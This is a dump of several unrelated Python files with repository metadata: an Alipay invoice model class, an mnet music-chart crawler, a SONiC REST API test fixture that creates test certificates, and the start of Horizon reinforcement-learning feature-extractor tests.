self._invoice_id = value
@property
def invoice_kind(self):
return self._invoice_kind
@invoice_kind.setter
def invoice_kind(self, value):
self._invoice_kind = value
@property
def invoice_memo(self):
return self._invoice_memo
@invoice_memo.setter
def invoice_memo(self, value):
self._invoice_memo = value
@property
def invoice_title(self):
return self._invoice_title
@invoice_title.setter
def invoice_title(self, value):
if isinstance(value, InvoiceTitleQueryOpenModel):
self._invoice_title = value
else:
self._invoice_title = InvoiceTitleQueryOpenModel.from_alipay_dict(value)
@property
def invoice_type(self):
return self._invoice_type
@invoice_type.setter
def invoice_type(self, value):
self._invoice_type = value
@property
def m_short_name(self):
return self._m_short_name
@m_short_name.setter
def m_short_name(self, value):
self._m_short_name = value
@property
def ori_blue_inv_code(self):
return self._ori_blue_inv_code
@ori_blue_inv_code.setter
def ori_blue_inv_code(self, value):
self._ori_blue_inv_code = value
@property
def ori_blue_inv_no(self):
return self._ori_blue_inv_no
@ori_blue_inv_no.setter
def ori_blue_inv_no(self, value):
self._ori_blue_inv_no = value
@property
def out_apply_id(self):
return self._out_apply_id
@out_apply_id.setter
def out_apply_id(self, value):
self._out_apply_id = value
@property
def out_trade_no(self):
return self._out_trade_no
@out_trade_no.setter
def out_trade_no(self, value):
self._out_trade_no = value
@property
def payee(self):
return self._payee
@payee.setter
def payee(self, value):
self._payee = value
@property
def payee_address(self):
return self._payee_address
@payee_address.setter
def payee_address(self, value):
self._payee_address = value
@property
def payee_bank_account(self):
return self._payee_bank_account
@payee_bank_account.setter
def payee_bank_account(self, value):
self._payee_bank_account = value
@property
def payee_bank_name(self):
return self._payee_bank_name
@payee_bank_name.setter
def payee_bank_name(self, value):
self._payee_bank_name = value
@property
def payee_register_name(self):
return self._payee_register_name
@payee_register_name.setter
def payee_register_name(self, value):
self._payee_register_name = value
@property
def payee_register_no(self):
return self._payee_register_no
@payee_register_no.setter
def payee_register_no(self, value):
self._payee_register_no = value
@property
def payee_tel(self):
return self._payee_tel
@payee_tel.setter
def payee_tel(self, value):
self._payee_tel = value
@property
def preview_image_url(self):
return self._preview_image_url
@preview_image_url.setter
def preview_image_url(self, value):
self._preview_image_url = value
@property
def sub_m_short_name(self):
return self._sub_m_short_name
@sub_m_short_name.setter
def sub_m_short_name(self, value):
self._sub_m_short_name = value
@property
def sum_tax_amount(self):
return self._sum_tax_amount
@sum_tax_amount.setter
def sum_tax_amount(self, value):
self._sum_tax_amount = value
@property
def trade_date(self):
return self._trade_date
@trade_date.setter
def trade_date(self, value):
self._trade_date = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.apply_from:
if hasattr(self.apply_from, 'to_alipay_dict'):
params['apply_from'] = self.apply_from.to_alipay_dict()
else:
params['apply_from'] = self.apply_from
if self.check_code:
if hasattr(self.check_code, 'to_alipay_dict'):
params['check_code'] = self.check_code.to_alipay_dict()
else:
params['check_code'] = self.check_code
if self.checker:
if hasattr(self.checker, 'to_alipay_dict'):
params['checker'] = self.checker.to_alipay_dict()
else:
params['checker'] = self.checker
if self.clerk:
if hasattr(self.clerk, 'to_alipay_dict'):
params['clerk'] = self.clerk.to_alipay_dict()
else:
params['clerk'] = self.clerk
if self.einv_code:
if hasattr(self.einv_code, 'to_alipay_dict'):
params['einv_code'] = self.einv_code.to_alipay_dict()
else:
params['einv_code'] = self.einv_code
if self.einv_no:
if hasattr(self.einv_no, 'to_alipay_dict'):
params['einv_no'] = self.einv_no.to_alipay_dict()
else:
params['einv_no'] = self.einv_no
if self.ex_tax_amount:
if hasattr(self.ex_tax_amount, 'to_alipay_dict'):
params['ex_tax_amount'] = self.ex_tax_amount.to_alipay_dict()
else:
params['ex_tax_amount'] = self.ex_tax_amount
if self.invoice_amount:
if hasattr(self.invoice_amount, 'to_alipay_dict'):
params['invoice_amount'] = self.invoice_amount.to_alipay_dict()
else:
params['invoice_amount'] = self.invoice_amount
if self.invoice_content:
if isinstance(self.invoice_content, list):
for i in range(0, len(self.invoice_content)):
element = self.invoice_content[i]
if hasattr(element, 'to_alipay_dict'):
self.invoice_content[i] = element.to_alipay_dict()
if hasattr(self.invoice_content, 'to_alipay_dict'):
params['invoice_content'] = self.invoice_content.to_alipay_dict()
else:
params['invoice_content'] = self.invoice_content
if self.invoice_date:
if hasattr(self.invoice_date, 'to_alipay_dict'):
params['invoice_date'] = self.invoice_date.to_alipay_dict()
else:
params['invoice_date'] = self.invoice_date
if self.invoice_id:
if hasattr(self.invoice_id, 'to_alipay_dict'):
params['invoice_id'] = self.invoice_id.to_alipay_dict()
else:
params['invoice_id'] = self.invoice_id
if self.invoice_kind:
if hasattr(self.invoice_kind, 'to_alipay_dict'):
params['invoice_kind'] = self.invoice_kind.to_alipay_dict()
else:
params['invoice_kind'] = self.invoice_kind
if self.invoice_memo:
if hasattr(self.invoice_memo, 'to_alipay_dict'):
params['invoice_memo'] = self.invoice_memo.to_alipay_dict()
else:
params['invoice_memo'] = self.invoice_memo
if self.invoice_title:
if hasattr(self.invoice_title, 'to_alipay_dict'):
params['invoice_title'] = self.invoice_title.to_alipay_dict()
else:
params['invoice_title'] = self.invoice_title
if self.invoice_type:
if hasattr(self.invoice_type, 'to_alipay_dict'):
params['invoice_type'] = self.invoice_type.to_alipay_dict()
else:
params['invoice_type'] = self.invoice_type
if self.m_short_name:
if hasattr(self.m_short_name, 'to_alipay_dict'):
params['m_short_name'] = self.m_short_name.to_alipay_dict()
else:
params['m_short_name'] = self.m_short_name
if self.ori_blue_inv_code:
if hasattr(self.ori_blue_inv_code, 'to_alipay_dict'):
params['ori_blue_inv_code'] = self.ori_blue_inv_code.to_alipay_dict()
else:
params['ori_blue_inv_code'] = self.ori_blue_inv_code
if self.ori_blue_inv_no:
if hasattr(self.ori_blue_inv_no, 'to_alipay_dict'):
params['ori_blue_inv_no'] = self.ori_blue_inv_no.to_alipay_dict()
else:
params['ori_blue_inv_no'] = self.ori_blue_inv_no
if self.out_apply_id:
if hasattr(self.out_apply_id, 'to_alipay_dict'):
params['out_apply_id'] = self.out_apply_id.to_alipay_dict()
else:
params['out_apply_id'] = self.out_apply_id
if self.out_trade_no:
if hasattr(self.out_trade_no, 'to_alipay_dict'):
params['out_trade_no'] = self.out_trade_no.to_alipay_dict()
else:
params['out_trade_no'] = self.out_trade_no
if self.payee:
if hasattr(self.payee, 'to_alipay_dict'):
params['payee'] = self.payee.to_alipay_dict()
else:
params['payee'] = self.payee
if self.payee_address:
if hasattr(self.payee_address, 'to_alipay_dict'):
params['payee_address'] = self.payee_address.to_alipay_dict()
else:
params['payee_address'] = self.payee_address
if self.payee_bank_account:
if hasattr(self.payee_bank_account, 'to_alipay_dict'):
params['payee_bank_account'] = self.payee_bank_account.to_alipay_dict()
else:
params['payee_bank_account'] = self.payee_bank_account
if self.payee_bank_name:
if hasattr(self.payee_bank_name, 'to_alipay_dict'):
params['payee_bank_name'] = self.payee_bank_name.to_alipay_dict()
else:
params['payee_bank_name'] = self.payee_bank_name
if self.payee_register_name:
if hasattr(self.payee_register_name, 'to_alipay_dict'):
params['payee_register_name'] = self.payee_register_name.to_alipay_dict()
else:
params['payee_register_name'] = self.payee_register_name
if self.payee_register_no:
if hasattr(self.payee_register_no, 'to_alipay_dict'):
params['payee_register_no'] = self.payee_register_no.to_alipay_dict()
else:
params['payee_register_no'] = self.payee_register_no
if self.payee_tel:
if hasattr(self.payee_tel, 'to_alipay_dict'):
params['payee_tel'] = self.payee_tel.to_alipay_dict()
else:
params['payee_tel'] = self.payee_tel
if self.preview_image_url:
if hasattr(self.preview_image_url, 'to_alipay_dict'):
params['preview_image_url'] = self.preview_image_url.to_alipay_dict()
else:
params['preview_image_url'] = self.preview_image_url
if self.sub_m_short_name:
if hasattr(self.sub_m_short_name, 'to_alipay_dict'):
params['sub_m_short_name'] = self.sub_m_short_name.to_alipay_dict()
else:
params['sub_m_short_name'] = self.sub_m_short_name
if self.sum_tax_amount:
if hasattr(self.sum_tax_amount, 'to_alipay_dict'):
params['sum_tax_amount'] = self.sum_tax_amount.to_alipay_dict()
else:
params['sum_tax_amount'] = self.sum_tax_amount
if self.trade_date:
if hasattr(self.trade_date, 'to_alipay_dict'):
params['trade_date'] = self.trade_date.to_alipay_dict()
else:
params['trade_date'] = self.trade_date
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = InvoiceQueryOpenModel()
if 'apply_from' in d:
o.apply_from = d['apply_from']
if 'check_code' in d:
o.check_code = d['check_code']
if 'checker' in d:
o.checker = d['checker']
if 'clerk' in d:
o.clerk = d['clerk']
if 'einv_code' in d:
o.einv_code = d['einv_code']
if 'einv_no' in d:
o.einv_no = d['einv_no']
if 'ex_tax_amount' in d:
o.ex_tax_amount = d['ex_tax_amount']
if 'invoice_amount' in d:
o.invoice_amount = d['invoice_amount']
if 'invoice_content' in d:
o.invoice_content = d['invoice_content']
if 'invoice_date' in d:
o.invoice_date = d['invoice_date']
if 'invoice_id' in d:
o.invoice_id = d['invoice_id']
if 'invoice_kind' in d:
o.invoice_kind = d['invoice_kind']
if 'invoice_memo' in d:
o.invoice_memo = d['invoice_memo']
if 'invoice_title' in d:
o.invoice_title = d['invoice_title']
if 'invoice_type' in d:
o.invoice_type = d['invoice_type']
if 'm_short_name' in d:
o.m_short_name = d['m_short_name']
if 'ori_blue_inv_code' in d:
o.ori_blue_inv_code = d['ori_blue_inv_code']
if 'ori_blue_inv_no' in d:
o.ori_blue_inv_no = d['ori_blue_inv_no']
if 'out_apply_id' in d:
o.out_apply_id = d['out_apply_id']
if 'out_trade_no' in d:
o.out_trade_no = d['out_trade_no']
if 'payee' in d:
o.payee = d['payee']
if 'payee_address' in d:
o.payee_address = d['payee_address']
if 'payee_bank_account' in d:
o.payee_bank_account = d['payee_bank_account']
if 'payee_bank_name' in d:
o.payee_bank_name = d['payee_bank_name']
if 'payee_register_name' in d:
o.payee_register_name = d['payee_register_name']
if 'payee_register_no' in d:
o.payee_register_no = d['payee_register_no']
if 'payee_tel' in d:
o.payee_tel = d['payee_tel']
if 'preview_image_url' in d:
o.preview_image_url = d['preview_image_url']
if 'sub_m_short_name' in d:
o.sub_m_short_name = d['sub_m_short_name']
if 'sum_tax_amount' in d:
o.sum_tax_amount = d['sum_tax_amount']
if 'trade_date' in d:
o.trade_date = d['trade_date']
if 'user_id' in d:
o.user_id = d['user_id']
return o
| [
"[email protected]"
] | |
c3538eb3371b01aba72df474025a27cb07554102 | bb160d2fc2c6182c4ca56c8e4635a14215f8c70f | /test_module/collector_test.py | d89697bcb6a78e55d06285541f3c33103c1160c4 | [] | no_license | bitacademy-howl/Music_Recommendation_mod | 9464ed941ff722123457ba18cf35bccee3640b9b | 94a430df1c65dc4b930f46ade4576bff95b6c27e | refs/heads/master | 2020-03-27T15:18:21.725593 | 2018-11-05T08:55:45 | 2018-11-05T08:55:45 | 146,709,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,630 | py | import datetime
import time
from bs4 import BeautifulSoup
import modules.collection.crawler as cw
from db_accessing import *
from db_accessing.VO import Music_VO, Artist_VO, Album_VO
from modules.collection.urlMaker import UrlMaker
class Collector:
def crawling_mnet_month_chart(url):
# crawling_from_chart
# mnet monthly chart 로부터 음원 데이터를 긁어오는 과정...
# VO 객체들
artistVO = Artist_VO()
albumVO = Album_VO()
musicVO = Music_VO()
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
#####################################################################################################################
# VO 값 입력
tag_music_list = bs.find('div', attrs={'class': 'MMLTable jQMMLTable'})
tag_tbody = tag_music_list.find('tbody')
tags_tr = tag_tbody.findAll('tr')
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
for tag_tr in tags_tr:
# item_title 태그내 정보들...
item_title_tag_td = tag_tr.find('td', attrs={'class': 'MMLItemTitle'})
# 8개 해야된다......
# 음원의 고유 아이디
musicVO.Music_ID = tag_tr.find('td', attrs={'class': 'MMLItemCheck'}).find('input')["value"]
musicVO.Music_Title = item_title_tag_td.find('a', attrs={'class': 'MMLI_Song'}).get_text()
album_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Album'})
artist_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Artist'})
print(album_tag)
print(artist_tag)
if album_tag != None:
albumVO.Album_Title = album_tag.get_text()
albumVO.Album_Node = album_tag["href"].strip(" ")
albumVO.Album_ID = int(albumVO.Album_Node.rsplit('/', 1)[1])
musicVO.Album_ID = albumVO.Album_ID
if artist_tag != None:
artistVO.Artist_Name = artist_tag.get_text()
# 객체 및 테이블에 노드 추가 할 것!
artistVO.Artist_Node = artist_tag["href"].strip(" ")
artistVO.Artist_ID = int(artistVO.Artist_Node.rsplit('/', 1)[1])
albumVO.Singer_ID = artistVO.Artist_ID
# #######commit 계속 안하고 한방에 못하는지 알아보고, ORM 객체 내 객체 포함...으로 알아볼 것!!!
# 양방향 머시기 하는듯...
db_session.merge(artistVO)
db_session.commit()
db_session.merge(albumVO)
db_session.commit()
db_session.merge(musicVO)
db_session.commit()
def crawling_track(url):
# 값을 입력할 VO 객체 생성
musicVO = Music_VO()
albumVO = Album_VO()
artistVO = Artist_VO()
# Music_ID 는 링크로부터 채워서 올것!
# Music_VO.Music_ID =
# bs from html response....
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
tag_music_info = bs.find('div', attrs={'class': 'music_info_view'})
# 곡 소개 테이블
summary = tag_music_info.find('div', attrs={'class': 'music_info_cont'})
album_tag = summary.find('tbody').find('a')
if album_tag is not None:
albumVO.Album_Node = album_tag['href'].strip(" ")
albumVO.Album_ID = albumVO.Album_Node.rsplit('/', 1)[1]
musicVO.Album_ID = albumVO.Album_ID
artist_tag = bs.find('span', attrs={'class': 'artist_txt'}).find('a')
if artist_tag != None:
artistVO.Artist_Node = artist_tag['href'].strip(" ")
artistVO.Artist_ID = artistVO.Artist_Node.rsplit('/', 1)[1]
artistVO.Artist_Name = artist_tag.get_text()
albumVO.Singer_ID = artistVO.Artist_ID
attrs = summary.find('li', attrs={'class': 'left_con'}).findAll('p', attrs={'class' : 'right'})
def crawling_artist(id):
artistVO = Artist_VO()
artistVO.Artist_ID = id
artistVO.Artist_Node = '/artist/{0}'.format(id)
artistVO.Group = False
url = ''.join(['http://www.mnet.com', artistVO.Artist_Node])
html = cw.crawling(url)
bs = BeautifulSoup(html, 'html.parser')
tag_artist_info = bs.find('div', attrs={'class': 'artist_info'})
if tag_artist_info is not None:
singer = tag_artist_info.find('a', attrs={'class': 'song_name'})
if singer is not None:
artistVO.Artist_Name = singer.get_text()
else:
artistVO.Artist_Name = tag_artist_info.find('li', attrs={'class': 'top_left'}).find(
'p').get_text().strip()
print("############# strip 결과 #############\n", artistVO.Artist_Name,
"\n############# strip 결과 #############\n")
a = tag_artist_info.find('div', attrs={'class': 'a_info_cont'})
tags = tag_artist_info.findAll('span', attrs={'class': 'right'})
for tag in tags:
if tag is not None:
text_list = tag.get_text().strip().replace(' ', '').replace('\r', '').replace('\n', '').replace(
'\t', '').replace('\xa0', '').split('|')
print(text_list)
for text in text_list:
if text == '남성' or text == '여성' or text == '혼성':
artistVO.Gender = text
if text == '그룹':
artistVO.Group = True
db_session.merge(artistVO)
db_session.commit()
time.sleep(0.5) # sleep 안주면 200 번째 request 이후 차단됨...
# 방화벽 or IPS
# 메인에서 호출할 함수들.....
def collecting_artist(self):
for id in range(1, 3000000, 1):
self.crawling_artist(id)
def collecting_track(self, node):
um = UrlMaker()
row_num_table = Music_VO.qurey.count()
for offs in range(0, row_num_table, 10):
result = Music_VO.query.limit(10).offset(offs).all()
for i in result:
self.crawling_track(um.direct_node_connect(i.Music_Node))
def collecting_chart(self):
um = UrlMaker()
for year in range(self.start_date.year, self.end_date.year+1):
for month in range(self.start_date.month, self.end_date.month+1):
try:
um.setDate(datetime.date(year, month, day=1))
um.url_maker_DATE_based()
for page_number in range(1, 3):
url = "".join([um.url_maker_DATE_based(), '?pNum=%d' % page_number])
print(url)
Collector.crawling_mnet_month_chart(url)
except ValueError:
break
# def __init__(self, start_date=datetime.date(2009, 1, 1), end_date=datetime.datetime.now().date()):
# # def __init__(self, start_date = datetime.date(2009, 1, 1), end_date = datetime.datetime.now().date()):
# self.start_date = start_date
# self.end_date = end_date
def __init__(self):
self.set_start_date()
self.end_date = datetime.datetime.now().date()
def set_start_date(self, year = 2009, month = 8, day = 1):
self.start_date = datetime.date(2009, 8, 1)
def set_end_date(self, year, month, day):
self.end_date = datetime.date(year, month, day) | [
"[email protected]"
] | |
62ccef834d24c047c8d8308cd15dcbfcacd02062 | 49663ea34b41c8180d7484f778f5cad2e701d220 | /tests/restapi/conftest.py | 8915e5344b0b69e02c6d33ddb2f2045958be013b | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | stepanblyschak/sonic-mgmt | ed08c98e7bff1615b057daa8711686aa5986073d | a1ae1e0b4e9927e6f52916f76121780d19ec3e54 | refs/heads/master | 2023-04-07T01:30:11.403900 | 2023-03-29T10:16:52 | 2023-03-29T10:16:52 | 135,678,178 | 0 | 0 | NOASSERTION | 2023-03-29T16:13:55 | 2018-06-01T06:41:49 | Python | UTF-8 | Python | false | false | 4,694 | py | import logging
import pytest
import urllib3
from six.moves.urllib.parse import urlunparse
from tests.common import config_reload
from tests.common.helpers.assertions import pytest_require as pyrequire
from tests.common.helpers.dut_utils import check_container_state
from helper import apply_cert_config
RESTAPI_CONTAINER_NAME = 'restapi'
@pytest.fixture(scope="module", autouse=True)
def setup_restapi_server(duthosts, rand_one_dut_hostname, localhost):
'''
Create RESTAPI client certificates and copy the subject names to the config DB
'''
duthost = duthosts[rand_one_dut_hostname]
# Check if RESTAPI is enabled on the device
pyrequire(check_container_state(duthost, RESTAPI_CONTAINER_NAME, should_be_running=True),
"Test was not supported on devices which do not support RESTAPI!")
# Create Root key
local_command = "openssl genrsa -out restapiCA.key 2048"
localhost.shell(local_command)
# Create Root cert
local_command = "openssl req \
-x509 \
-new \
-nodes \
-key restapiCA.key \
-sha256 \
-days 1825 \
-subj '/CN=test.restapi.sonic' \
-out restapiCA.pem"
localhost.shell(local_command)
# Create server key
local_command = "openssl genrsa -out restapiserver.key 2048"
localhost.shell(local_command)
# Create server CSR
local_command = "openssl req \
-new \
-key restapiserver.key \
-subj '/CN=test.server.restapi.sonic' \
-out restapiserver.csr"
localhost.shell(local_command)
# Sign server certificate
local_command = "openssl x509 \
-req \
-in restapiserver.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiserver.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Create client key
local_command = "openssl genrsa -out restapiclient.key 2048"
localhost.shell(local_command)
# Create client CSR
local_command = "openssl req \
-new \
-key restapiclient.key \
-subj '/CN=test.client.restapi.sonic' \
-out restapiclient.csr"
localhost.shell(local_command)
# Sign client certificate
local_command = "openssl x509 \
-req \
-in restapiclient.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiclient.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Copy CA certificate and server certificate over to the DUT
duthost.copy(src='restapiCA.pem', dest='/etc/sonic/credentials/')
duthost.copy(src='restapiserver.crt', dest='/etc/sonic/credentials/testrestapiserver.crt')
duthost.copy(src='restapiserver.key', dest='/etc/sonic/credentials/testrestapiserver.key')
apply_cert_config(duthost)
urllib3.disable_warnings()
yield
# Perform a config load_minigraph to ensure config_db is not corrupted
config_reload(duthost, config_source='minigraph')
# Delete all created certs
local_command = "rm \
restapiCA.* \
restapiserver.* \
restapiclient.*"
localhost.shell(local_command)
@pytest.fixture
def construct_url(duthosts, rand_one_dut_hostname):
def get_endpoint(path):
duthost = duthosts[rand_one_dut_hostname]
RESTAPI_PORT = "8081"
netloc = duthost.mgmt_ip+":"+RESTAPI_PORT
try:
tup = ('https', netloc, path, '', '', '')
endpoint = urlunparse(tup)
except Exception:
logging.error("Invalid URL: "+endpoint)
return None
return endpoint
return get_endpoint
@pytest.fixture
def vlan_members(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
VLAN_INDEX = 0
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
if mg_facts["minigraph_vlans"] != {}:
vlan_interfaces = list(mg_facts["minigraph_vlans"].values())[VLAN_INDEX]["members"]
if vlan_interfaces is not None:
return vlan_interfaces
return []
| [
"[email protected]"
] | |
80954ebe7830dd8dfab25e0a013922bc01815edb | 160ff0dbe7f9e5d740faa3ce13302190e1e5f1f0 | /Calc.py | db893a216b2d9cc553077be5697b83b7af2224fd | [] | no_license | sivatoms/PyReddy | 9a84e1568e9ee6c16c2b51ba6044059d31ae62dd | fcc0ab8705d409c6b609f9b5f5cffb8900dd8eb7 | refs/heads/master | 2021-06-26T17:42:43.104598 | 2021-01-20T21:40:06 | 2021-01-20T21:40:06 | 197,511,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py |
from Demo import wish
def add(a,b):
print(a+b)
def sub(a,b):
print(a-b)
def mul(a,b):
print(a*b)
def div(a,b):
print(a/b)
wish()
print("This is second modules") | [
"[email protected]"
] | |
03ff54224dfdb710b2127f90b62adc825688daf5 | 419637376e445ec9faf04c877d5fb6c09d15903f | /steam/admin/activity/productAuditService.py | ec92efa0a2a88750d9fbbdda4e0b8a68c42dbce8 | [] | no_license | litaojun/steamOmTest | e4203df30acafaa5e282631d77429c0e4483fb88 | 86f84dbd802d947198823e02c2f1ba2695418a76 | refs/heads/master | 2020-04-02T21:48:55.115389 | 2019-07-11T06:08:27 | 2019-07-11T06:08:27 | 154,812,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from steam.util.httpUopService import HttpUopService
from opg.bak.uopService import decorator
class ProductAuditService(HttpUopService):
'''
审核活动
'''
def __init__(self, kwargs):
super(ProductAuditService, self).__init__(module = "",
filename = "",
sqlvaluedict = kwargs )
@decorator(["setupAuditActivity"])
def optAuditActivity(self):
self.sendHttpReq() | [
"[email protected]"
] | |
a0b916ba59d2287f975c8dd6cacb536734ae2464 | 02a39e3492b37e612a7076fe35bc2c2a08e3426e | /ml/rl/test/preprocessing/test_feature_extractor.py | aa4c899cec483d6904b1c6ba26e6301559e6b45d | [
"BSD-3-Clause"
] | permissive | xuegangwu2016/Horizon | a0fd11c3bd3c763a07d113fbc6fd51d50a15252d | a7633d8375240b757b34645a1fbebb809d2eabf2 | refs/heads/master | 2020-04-10T08:11:56.004183 | 2018-12-07T06:40:34 | 2018-12-07T06:43:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,018 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import unittest
import numpy as np
import numpy.testing as npt
from caffe2.python import schema, workspace
from ml.rl import types as rlt
from ml.rl.preprocessing.feature_extractor import (
PredictorFeatureExtractor,
TrainingFeatureExtractor,
map_schema,
)
from ml.rl.preprocessing.identify_types import CONTINUOUS, PROBABILITY
from ml.rl.preprocessing.normalization import MISSING_VALUE, NormalizationParameters
from ml.rl.test.utils import NumpyFeatureProcessor
class FeatureExtractorTestBase(unittest.TestCase):
def get_state_normalization_parameters(self):
return {
i: NormalizationParameters(
feature_type=PROBABILITY if i % 2 else CONTINUOUS, mean=0, stddev=1
)
for i in range(1, 5)
}
def get_action_normalization_parameters(self):
# Sorted order: 12, 11, 13
return {
i: NormalizationParameters(
feature_type=CONTINUOUS if i % 2 else PROBABILITY, mean=0, stddev=1
)
for i in range(11, 14)
}
def setup_state_features(self, ws, field):
lengths = np.array([3, 0, 5], dtype=np.int32)
keys = np.array([2, 1, 9, 1, 2, 3, 4, 5], dtype=np.int64)
values = np.arange(8).astype(np.float32)
ws.feed_blob(str(field.lengths()), lengths)
ws.feed_blob(str(field.keys()), keys)
ws.feed_blob(str(field.values()), values)
return lengths, keys, values
def expected_state_features(self, normalize):
# Feature order: 1, 3, 2, 4
dense = np.array(
[
[1, MISSING_VALUE, 0, MISSING_VALUE],
[MISSING_VALUE, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
[3, 5, 4, 6],
],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
)
return dense
def setup_next_state_features(self, ws, field):
lengths = np.array([2, 2, 4], dtype=np.int32)
keys = np.array([2, 1, 9, 1, 2, 3, 4, 5], dtype=np.int64)
values = np.arange(10, 18).astype(np.float32)
ws.feed_blob(str(field.lengths()), lengths)
ws.feed_blob(str(field.keys()), keys)
ws.feed_blob(str(field.values()), values)
return lengths, keys, values
def expected_next_state_features(self, normalize):
# Feature order: 1, 3, 2, 4
dense = np.array(
[
[11, MISSING_VALUE, 10, MISSING_VALUE],
[13, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
[MISSING_VALUE, 15, 14, 16],
],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
)
return dense
def expected_tiled_next_state_features(self, normalize):
# NOTE: this depends on lengths of possible next action
# Feature order: 1, 3, 2, 4
dense = np.array(
[
[11, MISSING_VALUE, 10, MISSING_VALUE],
[13, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
[13, MISSING_VALUE, MISSING_VALUE, MISSING_VALUE],
],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [1, 3, 2, 4], self.get_state_normalization_parameters()
)
return dense
def setup_action(self, ws, field):
action = np.array([3, 2, 1], dtype=np.int64)
ws.feed_blob(str(field()), action)
return action
def setup_next_action(self, ws, field):
action = np.array([1, 2, 3], dtype=np.int64)
ws.feed_blob(str(field()), action)
return action
def setup_possible_next_actions(self, ws, field):
lengths = np.array([1, 2, 0], dtype=np.int32)
actions = np.array([3, 2, 1], dtype=np.int64)
ws.feed_blob(str(field["lengths"]()), lengths)
ws.feed_blob(str(field["values"]()), actions)
return lengths, actions
def setup_action_features(self, ws, field):
lengths = np.array([2, 4, 2], dtype=np.int32)
keys = np.array([11, 12, 14, 11, 12, 13, 13, 12], dtype=np.int64)
values = np.arange(20, 28).astype(np.float32)
ws.feed_blob(str(field.lengths()), lengths)
ws.feed_blob(str(field.keys()), keys)
ws.feed_blob(str(field.values()), values)
return lengths, keys, values
def expected_action_features(self, normalize):
# Feature order: 12, 11, 13
dense = np.array(
[[21, 20, MISSING_VALUE], [24, 23, 25], [27, MISSING_VALUE, 26]],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [12, 11, 13], self.get_action_normalization_parameters()
)
return dense
def setup_next_action_features(self, ws, field):
lengths = np.array([4, 2, 2], dtype=np.int32)
keys = np.array([11, 12, 14, 13, 12, 13, 11, 13], dtype=np.int64)
values = np.arange(30, 38).astype(np.float32)
ws.feed_blob(str(field.lengths()), lengths)
ws.feed_blob(str(field.keys()), keys)
ws.feed_blob(str(field.values()), values)
return lengths, keys, values
def expected_next_action_features(self, normalize):
# Feature order: 12, 11, 13
dense = np.array(
[[31, 30, 33], [34, MISSING_VALUE, 35], [MISSING_VALUE, 36, 37]],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [12, 11, 13], self.get_action_normalization_parameters()
)
return dense
def setup_possible_next_actions_features(self, ws, field):
lengths = np.array([1, 2, 0], dtype=np.int32)
values_lengths = np.array([1, 2, 3], dtype=np.int32)
keys = np.array([11, 12, 14, 11, 13, 12], dtype=np.int64)
values = np.arange(40, 46).astype(np.float32)
ws.feed_blob(str(field["lengths"]()), lengths)
ws.feed_blob(str(field["values"].lengths()), values_lengths)
ws.feed_blob(str(field["values"].keys()), keys)
ws.feed_blob(str(field["values"].values()), values)
return lengths, values_lengths, keys, values
def expected_possible_next_actions_features(self, normalize):
# Feature order: 12, 11, 13
dense = np.array(
[
[MISSING_VALUE, 40, MISSING_VALUE],
[41, MISSING_VALUE, MISSING_VALUE],
[45, 43, 44],
],
dtype=np.float32,
)
if normalize:
dense = NumpyFeatureProcessor.preprocess_array(
dense, [12, 11, 13], self.get_action_normalization_parameters()
)
return dense
def setup_reward(self, ws, field):
reward = np.array([0.5, 0.6, 0.7], dtype=np.float32)
ws.feed_blob(str(field()), reward)
return reward
def create_ws_and_net(self, extractor):
net, init_net = extractor.create_net()
ws = workspace.Workspace()
ws.create_net(init_net)
ws.run(init_net)
for b in net.input_record().field_blobs():
ws.create_blob(str(b))
ws.create_net(net)
return ws, net
def check_create_net_spec(
self, extractor, expected_input_record, expected_output_record
):
net, init_net = extractor.create_net()
# First, check that all outputs of init_net are used in net
for b in init_net.external_outputs:
self.assertTrue(net.is_external_input(b))
# Second, check that input and output records are set
input_record = net.input_record()
output_record = net.output_record()
self.assertIsNotNone(input_record)
self.assertIsNotNone(output_record)
# Third, check that the fields match what is expected
self.assertEqual(
set(expected_input_record.field_names()), set(input_record.field_names())
)
self.assertEqual(
set(expected_output_record.field_names()), set(output_record.field_names())
)
class TestTrainingFeatureExtractor(FeatureExtractorTestBase):
def create_extra_input_record(self, net):
return net.input_record() + schema.NewRecord(
net,
schema.Struct(
("reward", schema.Scalar()), ("action_probability", schema.Scalar())
),
)
def setup_extra_data(self, ws, input_record):
extra_data = rlt.ExtraData(
action_probability=np.array([0.11, 0.21, 0.13], dtype=np.float32)
)
ws.feed_blob(
str(input_record.action_probability()), extra_data.action_probability
)
return extra_data
def test_extract_max_q_discrete_action(self):
